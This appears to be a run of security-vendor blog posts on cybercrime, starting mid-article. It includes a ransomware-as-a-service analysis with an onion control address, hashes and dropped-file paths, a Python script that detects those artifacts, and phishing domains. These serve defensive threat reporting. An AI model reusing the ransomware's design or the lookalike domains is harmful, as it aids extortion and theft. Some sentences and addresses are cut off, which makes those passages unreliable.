Next to Russia, we believe North Korea is the next most important nation for cybercrime. Both hack banks for financial gain. In 2015-2016, for instance, a cybercrime campaign targeted dozens of banks in the SWIFT network, stealing tens of millions of dollars from banks in developing countries. The North Korean Reconnaissance General Bureau (RGB) has been linked to these attacks, which provided a lucrative way to supplement the North Korean government’s access to foreign currency.

Recognizing the difficulty of pulling off large-scale thefts from a single major western bank, the RGB targeted smaller, less sophisticated banks in developing countries like Bangladesh, Vietnam, and Ecuador. In Bangladesh, they used the victim banks’ credentials to send what looked like legitimate SWIFT fund transfer requests. These requests at first appeared legitimate to the receiving banks, since they were sent from legitimate partner banks through the established channels, so in some cases the money was transferred.

North Korea also has turned to cryptocurrency theft to help fund its regime. North Korean hackers targeted at least three South Korean cryptocurrency exchanges in 2017. Cryptocurrencies are a particularly valuable target for North Korea, which is able to use Bitcoin’s anonymity to circumvent international sanctions. Some researchers have speculated that North Korean actors have also been involved in attempts to surreptitiously install Bitcoin mining software on hacked computers, hijacking networks of compromised systems to mine for cryptocurrencies. The Pyongyang University of Science and Technology has begun offering its computer science students classes in Bitcoin and Blockchain, confirming North Korea’s growing interest in cryptocurrencies.

Hackers in North Korea and Russia, whether affiliated with the state or not, account for much of the cybercrime that occurs in the world. Until these nation-states change their behavior, either by stopping state support for hacking or by enforcing laws against criminal hackers, cybercrime will remain a major international problem.

The post A Map of the Most Dangerous Sources of Cybercrime appeared first on McAfee Blogs.

Mobile Menace Monday: Olympics app has more ads than games

An app claiming to live stream the 2018 Winter Olympics (but really serving up a blizzard of ads) had a short run on Google Play. It was uploaded to the Play store on February 8, 2018. Since then, it’s been removed. The last known existence of it on the store was a cached snapshot from February 10.

Poorly-made app

At first, things seem normal with a simple opening screen.

After displaying the first ad, it goes onto a navigation screen.

Click on each live stream link, and it’s a gamble whether it actually redirects to a functioning live stream or not. I found that most of the time, the app crashed. In contrast, the app’s ability to display ads never falters.


More ads than games

An app serving up ads in exchange for free use is nothing new, and most of us humbly accept it. The decision for mobile malware researchers to classify some of these apps as adware isn’t always easy. In this case, the Olympic streaming app doesn’t use anything unusual to serve ads. To put it another way, it isn’t using any known aggressive Ad SDKs. However, when these ads pop up after every click, it’s excessive.

It’s clear that the true intent here is not to live stream the Olympics, but to serve up as many ads as possible before the app crashes. Thus, we gave this failed app a classification of Android/Adware.LiveStream.

Combing through Google Play

The sheer number of apps like these found on Google Play that teeter on the line between clean or adware is overwhelming. As we have found time and time again, it’s impossible for Google Play to catch all of these. This is true even with Google’s more advanced Play Protect feature.

Moreover, it’s impossible for mobile malware researchers to keep up with all these “grey” apps as well. This is especially true with special cases like these, where detailed analysis is needed to make a determination. It’s important to note that even if apps like these do slip through, they are generally low risk.

User responsibility: tips to stay safe

Due to the overwhelming number of questionable apps on Google Play, some responsibility to pick safe apps must fall on users. Here are some tips to stay safe.

Check the details

Before installing an app, check the app’s details page for evidence of anything out of the ordinary. Things to look for are the app’s reviews, number of installs, and the last update. If there are a low number of reviews and/or the app has poor reviews, be wary. The same goes for a low number of installs of the app.

Lastly, if the app was recently updated, this could indicate that it was also recently uploaded to Google Play—which isn’t necessarily a bad thing, but it does make it harder to vet the app’s security. Unfortunately, Google Play doesn’t display when the app was first uploaded, so the updated date is the best data you have to determine whether it’s new or not.

If, after all this, you decide to install the app and it contains what you think is adware, no need to panic. Most of these grey apps just display annoying ads, and there is no other harm. Simply uninstall and go on with your day.

APK Samples

MD5: 9338E7E6D378DE01C14DB939D51B1D11

Package Name: com.ww2018OLYMPICLIVETV_6516426

The post Mobile Menace Monday: Olympics app has more ads than games appeared first on Malwarebytes Labs.

McAfee’s Podcast Hackable? is Back for Season Two

We live in a digital era, which means the more things are becoming internet-connected, the more opportunities hackers have to infiltrate our lives. McAfee created the podcast Hackable?, which has now been downloaded over 1 million times, to raise awareness about the extreme lengths hackers are willing to go in order to steal our personal information. This show takes hacks seen throughout pop culture and puts them to the test in the real world to separate fact from fiction. And now, Hackable? is back for season two and host Geoff Siskind, with the help of the crew of good-guy hackers, is back with even more excitement.

So – what’s in store for season two? In the premiere episode, “Keyless Entry,” host Geoff Siskind teams up with a white-hat hacker to see how easy it is to break into your car using a laptop. And the fun doesn’t stop there: as with season one, new episodes will be launching every two weeks.

Within these episodes, the crew finds themselves trapped in a smart car wash that’s been taken over by hackers, they learn just how simple it is to crack someone’s password and take over all of their accounts, and they put the security of traditional locks up against the new digital ones.

So, be sure to head over to Apple Podcasts to hear all the latest episodes as well as catch up on the excitement from season one. Don’t forget to subscribe, rate, and review. And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post McAfee’s Podcast Hackable? is Back for Season Two appeared first on McAfee Blogs.

Over 40% of online login attempts are attackers trying to invade accounts

Bots that traverse the internet on behalf of their human operators can fulfill both legitimate and malicious automated tasks. Statistics indicate that bot-driven internet traffic, by helper and harmful bots combined, surpasses human traffic.

The post Over 40% of online login attempts are attackers trying to invade accounts appeared first on WeLiveSecurity

Is Your Teen Using Tinder? Here’s What You Need to Know


Teens are curious. 
It’s fun to meet and date people they don’t see in the hallways every day. 
It feels good when someone swipes right and finds them attractive.
Flirting is fun. 

These are just a few reasons many teens are exploring Tinder these days, the dating app popular in the twenty- and thirty-something crowd.

While Tinder isn’t new (launched in 2012), app trends among teens change constantly, and this is a recent one. We’ve got a lot on our digital radar as parents, but when apps that match (underage) users within a defined geographic area get popular, they quickly shoot to the top of that radar. So, let’s take a look.

What’s the Big Deal

Tinder allows users 18 and over to register for nearby “matches,” but because Tinder links to Facebook accounts for verification, underage users can easily input a false birthdate to circumvent the rules.

To tweens and teens, chatting with people nearby sounds fun, but to parents, the app opens the door to anything from pedophiles to bullies to stalkers to abuse. From a parent’s point of view, when the dating pool widens, so too do the risks. High school students are not immune from abuse. In fact, according to, every year, approximately 1.5 million high school students nationwide experience physical abuse from a dating partner; one in three adolescents in the U.S. is a victim of physical, sexual, emotional or verbal abuse from a dating partner.

Tinder allows users to connect three main social accounts: Spotify, Instagram, and Facebook, which can easily put personal information into the hands of the wrong people. Users are also encouraged to give the name of their high school and their workplace to further refine matching.

Emotional Risks

While our first thought is physical danger, using dating apps too early also threatens a child’s emotional health and confuses their still-developing social and interpersonal skills. The risk of heartbreak, betrayal, and emotional abuse can be devastating for kids who aren’t ready to date — let alone wisely discern an endless pool of possible matches.

Too, there’s no shortage on Tinder of teens making it clear that they are just looking for a “hookup” or a “good time.” So, allowing tweens into that arena before they are ready can carry huge emotional and physical consequences.

Worth Distortion

Dating apps can also distort your child’s understanding of a worthy partner and reinforce looks-based relationships. If choosing a mate is as natural as swiping left (don’t like) and swiping right (like), then the hope of someday meeting “the one” could become a whole lot more difficult, if not impossible. And how much easier can your child’s uniqueness and worth be overlooked with just a swipe? Using dating apps before you are ready is an emotional wreck waiting to happen.

Under 18 

Monitor apps. Check your child’s phone for the Tinder app icon (see below). Don’t forget: Kids hide apps behind vault apps that may look like a game, a calculator, or a safe. So, do some clicking. If you discover your son or daughter is using Tinder, ask them why and have them walk you through how they use it personally. Discuss the reasons against using the app, listen to their reasoning, and decide on a family plan moving forward. If they are under 18, consider having them delete the app.

Tinder app icon.

Factors such as age and maturity will, no doubt, affect every family’s dating app plan. My daughter is almost 18, a high school senior, and heading to college in a blink. So, my conversation will be dramatically different from the parent of a 13-year-old.


Discuss the bigger picture. In a swipe right culture, values can quickly vanish. If you allow your child to date, discuss his or her relationship values. What makes a person attractive? What character traits do you desire? What expectations do you have of a relationship?

Over 18

Look beyond profiles. Advise your teen to do some sleuthing and look beyond a person’s Tinder profile for red flags revealing inconsistencies in truthfulness and character. Tinder warns: “Bad actors often push people to communicate off the platform immediately. It’s up to you to research and do your due diligence.”

Set up ground rules. Face-to-face meetings with a stranger outside of Tinder (or any online platform) should be in a public location. Your child should always drive his or her own vehicle and have their phone fully charged. Make sure they inform you of who they are meeting with and where.

Reality Check

Kids establishing online friendships is here to stay. Some of your child’s best friends will likely be found online. Dating apps aren’t “bad,” but people can be careless and abusive when using them. And, using dating apps under 18, as many kids are doing today, only invites premature risk.

Remember, a digital connection may not have been the way you met friends or love interests in your day, but it’s a natural channel today. Be open to the social shift but equally alert and willing to exercise full-throttle parenting to keep your kids safe.





Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post Is Your Teen Using Tinder? Here’s What You Need to Know appeared first on McAfee Blogs.

New McAfee Report Reveals Identity Theft is the Most Expensive Form of Property Crime

Between Uber, Equifax, and a handful of others, the U.S. has witnessed major data breaches in the past year that have compromised the personal information of millions, leaving them to deal with the possibility of identity theft. And the impact is not lost on consumers, as according to a recent McAfee survey, 61% of consumers say their concern about online security has increased over the past five years. So, to track the effects and financial impact of these attacks, the Center for Strategic and International Studies (CSIS) and McAfee released a new report, The Economic Impact of Cybercrime, which found that identity theft is the most expensive kind of property crime in the U.S.

So, just how much money have these breaches cost everyday consumers? Identity theft specifically has cost people $10 billion more than the losses attributed to all other property crime. You heard correctly: billion. The report also tells us that since 2014, nearly three billion internet credentials and other personally identifiable information (PII) have been stolen by hackers, and two-thirds of people online (more than two billion individuals) have had their personal information stolen or compromised. In fact, cybercrime ranks third in dollar value among illegal activities globally, just behind government corruption and narcotics trafficking.

Now the next question is – what’s being done to protect against this? Usually, those compromised by these attacks scan their bank statements, sign up for monitoring, and chop up their credit cards. But beyond that – not much. Even though consumers are concerned about their personal security, only 37% of individuals use an identity theft protection solution, and 28% have no plans to sign up for an ID theft protection solution, meaning there is still more that can be done. Therefore, to ensure your personal identity stays protected, follow these tips: 

  • Be careful about what you share. Signing up for new services usually requires you to provide personal information. But before giving that information away, it’s critical to consider the cost of doing so and determine if the service received is worth the cost of sharing that data.
  • Check your privacy settings. This is an easy one. You should adjust your settings to only share data when required, or only with people you know and trust.
  • Utilize an identity theft solution. With all this personal data floating around online, it’s important to stay aware of any attempts to steal your identity. Use an identity theft solution, such as McAfee Identity Theft Protection, that can help protect personally identifiable information from identity theft and fraud.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.


The post New McAfee Report Reveals Identity Theft is the Most Expensive Form of Property Crime appeared first on McAfee Blogs.

DDoS Attacks in the Netherlands Reveal Teen Gamers on Troublesome Path

At the end of January, the Netherlands was plagued by distributed denial of service (DDoS) attacks targeting various financial institutions, tech sites, and the Dutch tax authorities. At the time of the attacks it was unclear who was responsible, and this led to speculation among security experts.

Coincidentally, the attacks started a few days after it was announced in the media that the Dutch General Intelligence and Security Service, the AIVD, had played a major role in relaying crucial information to their American counterparts regarding attacks of suspected Russian state-sponsored hackers.

Thus, the hypothesis that the attacks were some kind of state-sponsored retaliation was quickly formed. Security experts deemed this hypothesis possible, but it remained unproven.


Then on February 1, an 18-year-old suspect was arrested by the National High Tech Crime Unit of the Dutch police. The suspect carelessly left behind some crucial pieces of evidence, which ultimately led to his arrest. Through open-source research, the McAfee Advanced Threat Research team was also able to find links between the arrested suspect and another known DDoS actor. At this moment the police investigation is ongoing to determine the degree of guilt and whether the suspect acted independently. But one thing is certain: The wave of attacks has stopped since his arrest.

The relative ease with which the attack was carried out is striking. The individual had presumably bought a “stresser/booter service” capacity for about €40. The stresser enabled him to launch attacks with a volume of about 40Gbps.

(Stresser, or booter, services are websites that offer distributed denial of service capability as a paid service. These websites offer a way to stress-test a host by simply filling in its IP address. The traffic power these services need can be generated from legitimate or illegitimate sources. Attacking a host or website without legal consent is highly illegal.)

McAfee Chief Scientist and Fellow Raj Samani has written “you can disrupt your competition for the price of a cup of coffee.” This attack suggests you can disrupt entire organizations or parts of a country for the price of a pound of good coffee beans.

Thus speculation of a possible state-sponsored retaliation dissolved into an inexpensive and relatively easy method of attack, performed by a teenager.

Earlier DDoS Attacks

This sequence of events reminds me of an earlier DDoS attack I personally investigated. In 2015 one of the largest internet service providers in the Netherlands suffered a DDoS attack for three consecutive days. This attack deprived roughly 1.8 million subscribers of Internet access. In a period of several weeks and after an extensive police investigation, a group of suspects was arrested. All but one of them were teenagers, with the youngest only 14 years old. Their methods were relatively simple as well, from basic Python scripts to the use of stresser/booter services.

I clearly recall that this group of suspects had a great affinity with online gaming. They were active on popular games such as Minecraft and Call of Duty and played a lot in groups or clans. Apparently, it was common practice for the suspects to knock their opponents offline during a game in order to win. Talk about fair play.

Could there be a connection between the gaming community and DDoS attacks, or is this purely a coincidence?

Gaming and DDoS

Who doesn’t remember the crippling Mirai DDoS attacks in the fall of 2016 on DNS provider Dyn, hosting provider OVH, and the popular security blog Krebs on Security?

Brian Krebs actively investigated the group behind the Mirai attacks against his site and published his findings online. During his research into the actors he described a fascinating world within the online gaming industry. In this industry it is big business to have powerful game servers, which attract many customers. This popularity makes those servers a target for the less successful, and their weapon of choice is often DDoS attacks. Game servers are apparently knocked offline daily to push gamers to migrate to the competition. All this distributed “violence” also gave birth to a lively and sometimes shady business in DDoS protection services.

So how would someone with only marginal technical knowledge go about knocking off websites? All it takes is a simple search on one of the entry-level hacker forums. We found dozens of threads (some listed below) that discussed what it would take to attack (game) servers. Subsequently, the same forum was full of advertisements and reviews of various stresser and booter services offered online.

In February news surfaced that an online gaming service offered DDoS for hire. According to the article, the operators of a gaming service were behind the building of an IoT botnet named JenX and offered it as part of the game server rental scheme.

This shows there is a definite link between the online gaming community and the use of DDoS attacks. It is worrying to see that some individuals resort to such drastic measures out of pure frustration. We can only imagine the consequences when such an individual gets a low grade in school or has a disagreement with an online retailer.

End Note

As a former law enforcement official, I am troubled to see teenagers going down a criminal path. I can understand that for teens it is not always easy to foresee the consequences of their actions. One might think that knocking off websites is all fun and games or a way to show your frustration. But from my experience the fun definitely stops when the police come knocking at the door. Then it is literally game over.


The post DDoS Attacks in the Netherlands Reveal Teen Gamers on Troublesome Path appeared first on McAfee Blogs.

To See Mugshots of Today’s Bank Robbers, Look at a World Map

In Depression-era America, bank robbers John Dillinger, Baby Face Nelson, and Pretty Boy Floyd were household names. Newspapers detailed their heists, radios narrated their getaways, wanted posters plastered their mug-shot scowls from coast-to-coast. Every detail of their bank robberies and personal lives was seized upon, scrutinized, circulated, and discussed.

Eight decades later, bank robbery is a digital, systematic crime practiced – with methods constantly improved – by organized syndicates. The stubbled faces of Dillinger, Nelson, and Floyd have been replaced by shapes on the world map tracing the borders of Russia, North Korea, and Iran. A former NSA Deputy Director said publicly in March that “nation states are robbing banks.”

A 2015-16 campaign stole hundreds of millions of dollars from banks in the Society for Worldwide Interbank Financial Telecommunication (SWIFT) network. SWIFT network banks in. That campaign, which targeted developing countries, was linked to the North Korean Reconnaissance General Bureau (RGB), security analysts believe. In 2017 North Korean hackers targeted at least three South Korean cryptocurrency exchanges, capitalizing on Bitcoin’s anonymity to circumvent international sanctions. The Pyongyang University of Science and Technology has begun offering its computer science students classes in Bitcoin and blockchain.

The best cybercriminals in the world live in Russia, where they are largely immune from prosecution. For instance, one of the cybercriminals who hacked Yahoo at the behest of Russian intelligence services, compromising millions of accounts, used the stolen data for spam and credit card fraud for personal benefit. Iran’s DDoS attack on leading U.S. banks exemplifies its coercive strategy to exert influence through disruption and destruction.

Hackers in these countries, whether affiliated with the state or not, account for much of the cost of global cybercrime. The latest strategy of their sophisticated operations is to target the “seams” between well-defended networks, exploiting weak points in the global financial network to pull off massive heists and in some cases further their national rhetoric.

To combat these operations, major international financial institutions are investing in defense, better fraud prevention, and transaction authentication. One report says that banks spend three times as much on cybersecurity as non-financial institutions to fight what has become a systematic risk to financial stability.

In the 1920s and ‘30s, the world sat back and watched John Dillinger, Baby Face Nelson, and Pretty Boy Floyd do their dirty work as the FBI slowly closed in. We can’t do that today. Governments, financial institutions, companies with banking records, and anyone with an ATM card should be invested in stopping financial cybercrime.

Banks have banded together to share information in near real time in order to protect the stability of the broader electronic financial system on which the world economy so heavily depends. Ultimately, they have determined that no one organization can go it alone when faced with such organized and well-funded adversaries. With the stability of the global financial system in play, unprecedented collaboration has become the new norm, and we at McAfee embrace the same spirit by building all of our technology to facilitate the sharing of critical data across hundreds of technology partners. It appears sharing and collaboration will be the only way to counter this new breed of adversary, and no one can go it alone anymore. The banks are leading the way in this new reality of Together is Power.

For more information, download the Economic Impact of Cybercrime report, and follow us on @McAfee.

The post To See Mugshots of Today’s Bank Robbers, Look at a World Map appeared first on McAfee Blogs.

The Many Forms of IP Theft Add Up to Big Losses

U.S. military drone technology surfaces on the black market and is bought by arms dealers. A pharmaceutical company based in Eastern Europe obtains trade secrets divulging the recipe for a popular prescription medication. A business that rejected an architect’s bid nevertheless uses part of that plan in construction. An advance copy of a much-anticipated “Game of Thrones” episode is sold to rabid fans on social media.

Welcome to the wide world of intellectual property theft, which accounts for one of the largest slices of overall global cybercrime. Unlike ransomware, crimes targeting financial institutions, or state-supported hacking, IP theft takes many forms – large and small, sophisticated and crude, strategic and unintentional – making it especially difficult to address. When it involves military technology, IP theft creates risks to national security. When it involves unlicensed use of creative assets, the losses can be invisible to the victim. Yet a resulting decline in revenue has an impact.

How serious is the global issue of IP theft? Diplomacy at the highest level prioritizes addressing IP theft above addressing state-run espionage. At the 2015 summit between Presidents Xi Jinping of China and Barack Obama of the United States, the leaders agreed that “neither country’s government will conduct or knowingly support cyber-enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sectors.” Interestingly, the language of this agreement was drafted by the U.S. to allow continued espionage. China and the U.S. tacitly agreed that they could continue to spy on each other if there was a national security justification. The resulting 2015 Obama-Xi agreement on commercial cyber espionage may have “saved” the U.S. perhaps as much as $15 billion a year.

Putting a value on IP is an art. How much is spent on research and development does not determine the value of IP. Companies can estimate what the IP would fetch on the market if offered for sale or licensing. Companies can also estimate the future revenue stream their IP will produce, but there may be a long lag between theft and the introduction of a competing product. One way to measure the cost of intellectual property theft is to look for competing products that take market share from the rightful owners. If hackers steal intellectual property from a small or medium-sized enterprise, such as its product designs, the theft can be fatal to the business.

McAfee’s estimate puts the value of all IP in the U.S. at $12 trillion, with an annual increase of between $700 billion and $800 billion. Based on our earlier analyses, and assuming that loss rates from IP theft track other kinds of cybercrime and reflect the effect of the Obama-Xi agreement, we estimate annual losses for the U.S. of between $10 billion and $12 billion from cybercrime targeting IP, and perhaps $50 billion to $60 billion globally.

These figures may not reflect the full global loss. IP theft is everywhere, in many different forms.

For more information, download the latest Economic Impact of Cybercrime report, and follow us on @McAfee.

The post The Many Forms of IP Theft Add Up to Big Losses appeared first on McAfee Blogs.

Cybercrime weighs most heavily on financial service firms

A further breakdown of the overall figures shows that, in all, the actual cost hinges on a number of variables. The factors that enter heavily into the equation include attack types and their frequency, along with the organization’s size and even the country in which an organization is based.

The post Cybercrime weighs most heavily on financial service firms appeared first on WeLiveSecurity

Free Ransomware Available on Dark Web

The McAfee Advanced Threat Research team recently analyzed a ransomware-as-a-service threat that is available for free and without registration. This malware was first seen in July 2017 with the extension .shifr. It has now appeared in recent detections with the extension .cypher.


Ransomware-as-a-service is a cybercrime economic model that allows malware developers to earn money for their creations without the need to distribute their threats. Nontechnical criminals buy their wares and launch the infections, while paying the developers a percentage of their take. The developers run relatively few risks, and their customers do most of the work.

Some ransomware-as-a-service, such as RaaSberry, use subscriptions while others require registration to gain access to the ransomware. The ransomware developer hosts a service on the “dark web” that allows any buyer to create and modify the malware. For example, the buyer can add custom ransom notes and the amount of the payment. More advanced services offer features such as evasion techniques to avoid detection and analysis. The service can also offer a control server with an administration panel to manage each victim. This system is convenient for both the developer, who makes money by selling malware, and for buyers, who gain ready-to-deploy ransomware without needing any specific coding knowledge.

The underground economy behind this service is well organized, effectively offering a cybercrime infrastructure. Basically, the ransomware is available on a website. The buyer sets up the ransomware by adding a wallet address. The ransomware is then available to download. The buyer just needs to customize and spread the malware. When a victim pays the ransom, a percentage is delivered both to the buyer and to the malware coder.


The ransomware is available on the TOR network at hxxp://kdvm5fd6tn6jsbwh.onion. A web page guides buyers through the configuration process.

On the configuration page, a generic XMPP address suggests we may have found a demo version of the ransomware.

On the page, the buyer need only to add a Bitcoin wallet address and the amount of the ransom. Once that is done, the malware is generated and can be downloaded. With this malware, the developer earns a 10% commission on every payment. Now let’s look at the malware sample.

Dynamic Analysis 

When the malware launches on the victim’s system, it checks for an Internet connection. If there is none, it exits the process. Otherwise, it contacts the following addresses to download the encryption key:

Once the file is running, it creates several files on the system:

  • Encryption_key: the RSA key encrypted in AES
  • Lock_file: an indicator that the system is encrypted
  • Uuid_file: a reference for the infected machine. A TOR address is generated with this ID.

The encryption key is downloaded from hxxps://

The ransom note is created on the desktop.

The file “HOW_TO_DECRYPT_FILES.html” gives a link to the TOR network.

Once the files are encrypted, the ransom note is displayed in HTML and points to the TOR site hxxp://kdvm5fd6tn6jsbwh.onion/ with the ID of the infected machine.

Allegedly after payment, the victim can download the file decrypter.exe and unlock encrypted files, which have the extension .cypher.

The malware encrypts the following file extensions:

The targeted extensions include many picture and photography files related to Canon, Kodak, Sony, and others. There are also extensions for AutoCAD, Autodesk projects, scalable vector images, and Microsoft Office files. These files are mostly used by designers, photographers, architects, and many others.

Digging Deeper

The malware runs on 64-bit systems and is coded in Golang (“Go language,” from Google), a programming language similar to C with some improvements in error management. It is not common to find malware using Golang, although this is not the first time that we have analyzed such malware. This threat is pretty big compared with most other malware, larger than 5.5MB. The file size can make analysis more difficult and can also help evade hardcoded antimalware file-inspection sizes.

Reverse engineering in Golang is a bit different than in other languages. Golang binaries are usually bigger than other executables. (By default, the compiler statically links the program’s libraries, resulting in a bigger file.)

A drawback for attackers is that such big binaries can be easily detected on a corporate network. Large files are “noisier” and may appear suspicious when arriving from an external source. They can also be less convenient for attackers to deal with because they can make the infection process more difficult.

The first interesting function to analyze in a Golang binary is the “main_main.” The malware starts by gathering environment variables. It then checks whether the file “lock_file” exists in the directory C:\Users\<username>\AppData\Roaming.

The function “main_Exists” will check for the file. If it does not exist, the malware exits the process.

If the file does exist, the malware downloads the public key from the control server.

The malware contacts the address  hxxps://kdvm5fd6tn6jsbwh.onion/new_c/<nameofmalware>. The encryption public key is stored directly on the website.

This address is generated when the buyer creates the ransomware on the developer’s web page; thus the same malware encrypts files with the same public key.

The malware generates the AES key and tries to find any network share by querying drive letters.

This function tries to find network shares:

Before a file is encrypted, the malware creates another file in C:\Users\<username>\AppData\Roaming\uuid_file to use as a victim identifier.

The malware encrypts the files using AES and deletes them after encryption with the function “os.remove” to avoid any simple forensic recovery.

The decrypter, which can be downloaded, works in a similar way but it requests the private key that the victims must pay for at hxxps:// The mechanism behind the encryption routine seems to be on the online server and the decryption key cannot be easily recovered.

The following information describes the decrypter.


Cybercrime-as-a-service is not new, yet it is now more widespread than ever. In this case, the malware is available for free but the ransomware developer earns a 10% fee from each victim who pays a ransom. The use of Golang is not common for malware. Most ransomware-as-a-service is not free, which could indicate this might be a demonstration version, or a proof of concept for future sale.

This malware is not advanced and was coded without evasion techniques, such as DGA, SSL for control, encryption, or even file compression. Looking at the targeted file extensions suggests the victims can range from general home or business users to the graphics industry. Although such malware is not difficult to analyze, it can be very destructive in a corporate environment.

Keep in mind that paying a ransom is no guarantee of receiving a decryption key. McAfee advises that you never pay a ransom. You can find further information and help on unlocking some ransomware threats at

McAfee detects this threat as Ransomware-FPDS!0F8CCEE515B8.


Indicators of Compromise


  • cb73927aa749f88134ab7874b15df898c014a35d519469f59b1c85d32fa69357
  • 0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c

IP address:

  • hxxp://kdvm5fd6tn6jsbwh.onion

Files created:

  • C:\Users\<username>\AppData\Roaming\uuid_file
  • C:\Users\<username>\AppData\Roaming\lock_file
  • C:\Users\<username>\AppData\Roaming\encryption_key
  • C:\Users\<username>\Desktop\HOW_TO_DECRYPT_FILES.html

Encryption extension:

  • .cypher
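The host artifacts listed above (the three marker files under AppData\Roaming, the desktop ransom note and the .cypher extension) are enough for a simple endpoint triage routine. The following is an added example written for this post, not McAfee's code: it classifies file-creation records against those indicators and flags a burst of .cypher files as encryption in progress. The sample event log, the burst threshold and the "high/medium/clean" verdict scale are constructed assumptions.

```python
"""Triage file-creation records for the .cypher ransomware artifacts.

Added example, not McAfee's code. Paths, marker names and the .cypher
extension come from the write-up; sample events and thresholds are
constructed assumptions.
"""
import datetime as dt
import ntpath

# Marker files the write-up reports under C:\Users\<user>\AppData\Roaming
ROAMING_MARKERS = {"uuid_file", "lock_file", "encryption_key"}
RANSOM_NOTE = "how_to_decrypt_files.html"      # dropped on the Desktop
ENCRYPTED_EXT = ".cypher"

# Constructed heuristic: this many .cypher files inside the window = burst
BURST_COUNT = 5
BURST_WINDOW = dt.timedelta(seconds=60)


def classify_path(path):
    """Return the indicator name a single Windows path matches, or None."""
    head, tail = ntpath.split(path)
    head, tail = head.lower(), tail.lower()
    if tail in ROAMING_MARKERS and head.endswith(r"\appdata\roaming"):
        return "roaming_marker:" + tail
    if tail == RANSOM_NOTE and head.endswith(r"\desktop"):
        return "ransom_note"
    if tail.endswith(ENCRYPTED_EXT):
        return "encrypted_file"
    return None


def _user_from_path(path):
    """Extract <user> from C:\\Users\\<user>\\... (None for other layouts)."""
    parts = path.split("\\")
    if len(parts) > 2 and parts[1].lower() == "users":
        return parts[2]
    return None


def _has_burst(times):
    """True if BURST_COUNT consecutive timestamps fall within BURST_WINDOW."""
    times = sorted(times)
    for i in range(len(times) - BURST_COUNT + 1):
        if times[i + BURST_COUNT - 1] - times[i] <= BURST_WINDOW:
            return True
    return False


def _verdict(indicators, burst):
    if not indicators:
        return "clean"
    markers = any(i.startswith("roaming_marker") for i in indicators)
    if markers and ("ransom_note" in indicators or burst):
        return "high"       # marker files plus note or mass encryption
    return "medium"         # partial match, worth a closer look


def triage(events):
    """events: iterable of (datetime, path) file-creation records.

    Returns the distinct indicators seen, the user profiles that held a
    marker or note, whether a .cypher burst occurred, and a verdict.
    """
    indicators, users, cypher_times = set(), set(), []
    for ts, path in events:
        hit = classify_path(path)
        if hit is None:
            continue
        indicators.add(hit)
        if hit != "encrypted_file":
            user = _user_from_path(path)
            if user:
                users.add(user)
        else:
            cypher_times.append(ts)
    burst = _has_burst(cypher_times)
    return {"indicators": sorted(indicators), "affected_users": sorted(users),
            "burst": burst, "verdict": _verdict(indicators, burst)}


def sample_events():
    """Constructed file-creation log (not from a real incident)."""
    t0 = dt.datetime(2018, 2, 20, 9, 0, 0)
    rows = [
        (0, r"C:\Users\alice\AppData\Roaming\lock_file"),
        (1, r"C:\Users\alice\AppData\Roaming\uuid_file"),
        (2, r"C:\Users\alice\AppData\Roaming\encryption_key"),
        (5, r"C:\Users\alice\Documents\Q1-budget.xlsx.cypher"),
        (6, r"C:\Users\alice\Pictures\IMG_0001.cr2.cypher"),
        (7, r"C:\Users\alice\Pictures\IMG_0002.cr2.cypher"),
        (8, r"\\fileserver\design\plan.dwg.cypher"),      # network share
        (9, r"\\fileserver\design\logo.svg.cypher"),
        (40, r"C:\Users\alice\Desktop\HOW_TO_DECRYPT_FILES.html"),
        (41, r"C:\Users\bob\AppData\Local\Temp\setup.log"),  # benign noise
    ]
    return [(t0 + dt.timedelta(seconds=s), p) for s, p in rows]


if __name__ == "__main__":
    print(triage(sample_events()))
```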



The post Free Ransomware Available on Dark Web appeared first on McAfee Blogs.

COINHOARDER: Tracking a Ukrainian Bitcoin Phishing Ring DNS Style

This post is authored by Jeremiah O'Connor and Dave Maynor with contributions from Artsiom Holub and Austin McBride. 

Executive Summary

Cisco has been tracking a bitcoin theft campaign for over 6 months. The campaign was discovered internally and researched with the aid of an intelligence sharing partnership with Ukraine Cyberpolice. The campaign was very simple, and after initial setup the attackers needed only to continue purchasing Google AdWords to ensure a steady stream of victims. This campaign targeted specific geographic regions and allowed the attackers to amass millions in revenue through the theft of cryptocurrency from victims. This campaign demonstrates just how lucrative these sorts of malicious attacks can be for cybercriminals. Additionally, the revenue generated by these sorts of attacks can then be reinvested into other cybercriminal operations.


On February 24, 2017, Cisco observed a massive phishing campaign hosted in Ukraine targeting the popular Bitcoin wallet site with a client request magnitude of over 200,000 client queries. This campaign was unique in that adversaries leveraged Google Adwords to poison user search results in order to steal users' wallets. Since Cisco observed this technique, it has become increasingly common in the wild with attackers targeting many different crypto wallets and exchanges via malicious ads.

Cisco identified an attack pattern in which the threat actors behind the operation would establish a "gateway" phishing link that would appear in search results among Google Ads. When searching for crypto-related keywords such as "blockchain" or "bitcoin wallet," the spoofed links would appear at the top of search results. When clicked, the link would redirect to a "lander" page and serve phishing content in the native language of the geographic region of the victim's IP address.

The reach of these poisoned ads can be seen when analyzing DNS query data. In February 2017, Cisco observed spikes in DNS queries for the fake cryptocurrency websites where upwards of 200,000 queries per hour can be seen during the time window the ad was displayed. Here are two examples.

DNS Statistics for block-clain[.]info
The domain block-clain[.]info was used as the initial "gateway" victims would first visit. Victims would immediately be redirected to blockchalna[.]info, the landing page where the actual phishing content was hosted. These fraudulent sites are mostly hosted on bulletproof hosting providers based in Europe.

Here is what the actual lander phishing site looked like. Note how similar and convincing it is compared to a real site, with the exception of the URL:

Finding Additional Pivots

After discovering these domains and the activity on Google Adwords, Cisco implemented a system to flag similar domains as malicious. This resulted in DNS requests being blocked to said domains. Additionally, Cisco researchers were able to track and monitor related networks and info, such as WHOIS registrant data.

This information allowed Cisco to use DNS graph traversal techniques to uncover other phishing domains associated with the initial site. In this example, we can see the registrant dsshvxcnbbu@yandex[.]ru, which is also associated with many other phishing sites:
Cisco also monitored the networks these domains are hosted on. Here is a snapshot of 2 of the recently active IP addresses for this campaign, and, and the ASN associated with these domains, Highload Systems, in Ukraine.
